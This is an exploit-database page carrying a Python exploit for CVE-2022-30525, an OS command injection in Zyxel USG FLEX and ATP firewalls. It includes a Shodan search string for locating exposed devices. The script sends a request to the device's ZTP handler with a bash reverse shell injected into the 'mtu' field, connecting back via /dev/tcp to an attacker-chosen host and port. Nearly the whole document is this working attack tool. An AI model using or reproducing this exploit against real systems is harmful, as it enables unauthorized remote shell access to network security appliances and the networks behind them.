# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection # Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800" # Date: May 18th 2022 # Exploit Author: Valentin Lobstein # Vendor Homepage: https://www.zyxel.com # Version: ZLD5.00 thru ZLD5.21 # Tested on: Linux # CVE: CVE-2022-30525 from requests.packages.urllib3.exceptions import InsecureRequestWarning import sys import json import base64 import requests import argparse parser = argparse.ArgumentParser( prog="CVE-2022-30525.py", description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444", ) parser.add_argument("-u", dest="url", help="Specify target URL") parser.add_argument("-r", dest="host", help="Specify Remote host") parser.add_argument("-p", dest="port", help="Specify Remote port") args = parser.parse_args() banner = ( "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7" "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg" "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg" "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8" "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg" "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n" "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp" "biA6KSApCg==" ) def main(): print("\n" + base64.b64decode(banner).decode("utf-8")) if None in vars(args).values(): print(f"[!] Please enter all parameters !") parser.print_help() sys.exit() if "http" not in args.url: args.url = "https://" + args.url args.url += "/ztp/cgi-bin/handler" exploit(args.url, args.host, args.port) def exploit(url, host, port): headers = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", "Content-Type": "application/json", } data = { "command": "setWanPortSt", "proto": "dhcp", "port": "4", "vlan_tagged": "1", "vlanid": "5", "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";', "data": "hi", } requests.packages.urllib3.disable_warnings(InsecureRequestWarning) print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}") try: response = requests.post( url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5 ) except (KeyboardInterrupt, requests.exceptions.Timeout): print("[!] Bye Bye hekcer !") sys.exit(1) finally: try: print("[!] Can't exploit the target ! Code :", response.status_code) except: print("[!] Enjoy your shell !!!") if __name__ == "__main__": main()


See this note in RAW Version
Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top